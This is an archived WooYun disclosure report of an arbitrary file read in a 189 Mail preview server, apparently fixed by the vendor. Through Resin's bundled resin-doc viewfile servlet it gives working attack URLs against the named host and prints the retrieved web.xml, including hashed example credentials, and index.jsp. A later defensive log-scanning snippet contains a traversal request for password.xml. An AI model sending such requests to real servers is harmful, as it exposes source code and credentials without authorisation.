WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2014-08-21: Details sent to the vendor, awaiting vendor response
2014-08-22: Vendor confirmed; details disclosed to the vendor only
2014-09-01: Details disclosed to core white hats and relevant domain experts
2014-09-11: Details disclosed to regular white hats
2014-09-21: Details disclosed to intern white hats
2014-10-05: Details disclosed to the public
A 189 Mail subdomain has an arbitrary file read vulnerability that exposes the source code of any file
Vulnerable URL: http://preview.mail.189.cn:8081/
A quick look shows the server is running Resin/3.1.8. In a default installation, Resin's /webapps directory contains an expanded war file under /resin-doc. This documentation app ships a servlet used for browsing files from the integrated manual, and that servlet can be used, with no further requirements, to browse arbitrary files in the web root. Testing an attack URL:
http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml
The attack succeeds and returns the contents of WEB-INF/web.xml.
The file can then be analysed for sensitive information.
WEB-INF/web.xml:

<web-app>
  <display-name>login-xml</display-name>

  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
    <welcome-file>index.html</welcome-file>
  </welcome-file-list>

  <!-- this is the jsp that a 'login' link uses -->
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Home</web-resource-name>
      <url-pattern>/home.jsp</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <!-- '*' for a <role-name> means "authenticated user with any role"
           The user must be logged in with some kind of role to access the home page. -->
      <role-name>*</role-name>
    </auth-constraint>
  </security-constraint>

  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Professors</web-resource-name>
      <url-pattern>/professors/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>professor</role-name>
    </auth-constraint>
  </security-constraint>

  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Students</web-resource-name>
      <url-pattern>/students/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>student</role-name>
      <role-name>professor</role-name>
    </auth-constraint>
  </security-constraint>

  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Staff</web-resource-name>
      <url-pattern>/staff/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>staff</role-name>
      <role-name>professor</role-name>
    </auth-constraint>
  </security-constraint>

  <login-config>
    <auth-method>form</auth-method>
    <form-login-config>
      <form-login-page>/login.jsp</form-login-page>
      <form-error-page>/login.jsp?login_error=1</form-error-page>
    </form-login-config>
  </login-config>

  <!-- Resin-specific XmlAuthenticator configuration -->
  <authenticator>
    <type>com.caucho.server.security.XmlAuthenticator</type>
    <init>
      <!-- Optionally put user information here. -->
      <user>pince:Txpd1jQc/xwhISIqodEjfw==:staff,website</user>
      <user>filch:KmZIq2RKXAHV4BaoNHfupQ==:staff</user>
      <!-- You can also use an external file -->
      <path>WEB-INF/password.xml</path>
    </init>
  </authenticator>

  <security-role>
    <role-name>professor</role-name>
  </security-role>
  <security-role>
    <role-name>student</role-name>
  </security-role>
  <security-role>
    <role-name>staff</role-name>
  </security-role>
  <security-role>
    <description>member of the slytherin house</description>
    <role-name>slytherin</role-name>
  </security-role>
  <security-role>
    <description>member of the gryffindor house</description>
    <role-name>gryffindor</role-name>
  </security-role>
  <security-role>
    <description>member of the ravenclaw house</description>
    <role-name>ravenclaw</role-name>
  </security-role>
  <security-role>
    <description>member of the hufflepuff house</description>
    <role-name>hufflepuff</role-name>
  </security-role>
  <security-role>
    <description>website administrator</description>
    <role-name>website</role-name>
  </security-role>
</web-app>
Next, request the source of index.jsp:
http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=index.jsp
Successfully retrieved:
index.jsp:

<%@ taglib prefix='c' uri='http://java.sun.com/jsp/jstl/core' %>
<%@ include file="/inc/nobrowsercache.jspf" %>
<%-- /index.jsp - default page for website. --%>
<html>
  <head>
    <title>Hogwart's</title>
  </head>
  <body>
    <%@ include file="/inc/buttonbar.jspf" %>
    <h1>Welcome to Hogwart's!</h1>
    This is a Defense Against the Dark Arts example of using JSP/Servlet security.
    <a href="<c:url value='index.xtp'/>">Tutorial documentation</a> is available.
    <p>
    Try doing a
    <c:choose>
      <c:when test="${empty pageContext.request.userPrincipal}">
        <a href="<c:url value='home.jsp'/>">login</a>
      </c:when>
      <c:otherwise>
        <a href="<c:url value='logout.jsp'/>">logout</a>
      </c:otherwise>
    </c:choose>
    <p>
    To get a better understanding of how security works, try using the following
    links both when you are logged in and when you are not.
    <p>
    All of the links are in secure areas. If you are not logged in a login procedure
    is put in by Resin before you get to the pages. If you are logged in, you may be
    able to see them or you may get a 'Forbidden' error.
    <p>
    Links to different areas:
    <ul>
      <li><a href="<c:url value='students/'/>"> Students (available to 'students' and 'professors') </a>
      <li><a href="<c:url value='professors/'/>"> Professors (available to 'professors') </a>
      <li><a href="<c:url value='staff/'/>"> Staff (available to 'staff' and 'professors') </a>
    </ul>
    In a real application, you wouldn't show links like this -- you would get the
    user to login first and then only display the links that are available for their role.
    <%@ include file="/inc/footer.jspf" %>
  </body>
</html>
If the requested file does not exist, the error response discloses the filesystem path.
You know what that means.
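As an added example (not part of the original report), the following Python snippet shows how a defender could spot this pattern in web server access logs: it flags every request to a /resin-doc/.../viewfile endpoint and rates it higher when the file parameter targets WEB-INF or META-INF or attempts directory traversal. The log lines are constructed samples modelled on the URLs above, not captured traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Aug/2014:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 512
10.0.0.7 - - [21/Aug/2014:10:01:09 +0800] "GET /resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml HTTP/1.1" 200 4096
10.0.0.7 - - [21/Aug/2014:10:01:15 +0800] "GET /resin-doc/examples/security-basic/viewfile?file=index.jsp HTTP/1.1" 200 2048
10.0.0.7 - - [21/Aug/2014:10:01:21 +0800] "GET /resin-doc/examples/security-basic/viewfile?file=..%2F..%2FWEB-INF%2Fpassword.xml HTTP/1.1" 404 300
10.0.0.9 - - [21/Aug/2014:10:02:00 +0800] "GET /resin-doc/ HTTP/1.1" 200 1500
"""

# Minimal CLF parser: client IP, timestamp, method, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return a severity label for one request target, or None if it is not a viewfile request."""
    parts = urlsplit(target)
    if "/resin-doc/" not in parts.path or not parts.path.endswith("/viewfile"):
        return None
    file_param = parse_qs(parts.query).get("file", [""])[0]
    if not file_param:
        return "low"       # servlet touched, but no file requested
    # parse_qs already decodes once; unquote again to catch double-encoded traversal
    path = unquote(file_param).replace("\\", "/").lower()
    if ".." in path.split("/") or path.startswith("/"):
        return "high"      # traversal attempt outside the example directory
    if "web-inf" in path or "meta-inf" in path:
        return "high"      # deployment descriptors, password files, compiled classes
    return "medium"        # any other source file read through the doc servlet


def scan_log(text):
    """Return (ip, status, severity, target) tuples for every suspicious viewfile request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        sev = classify_request(m.group("target"))
        if sev:
            findings.append((m.group("ip"), m.group("status"), sev, m.group("target")))
    return findings
```

A 404 on a viewfile request is still worth alerting on, since the report notes that a missing file makes the servlet disclose the server path in its error response.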
Severity: Low
Vulnerability Rank: 5
Confirmed: 2014-08-22 23:05
Fixed, thank you.
None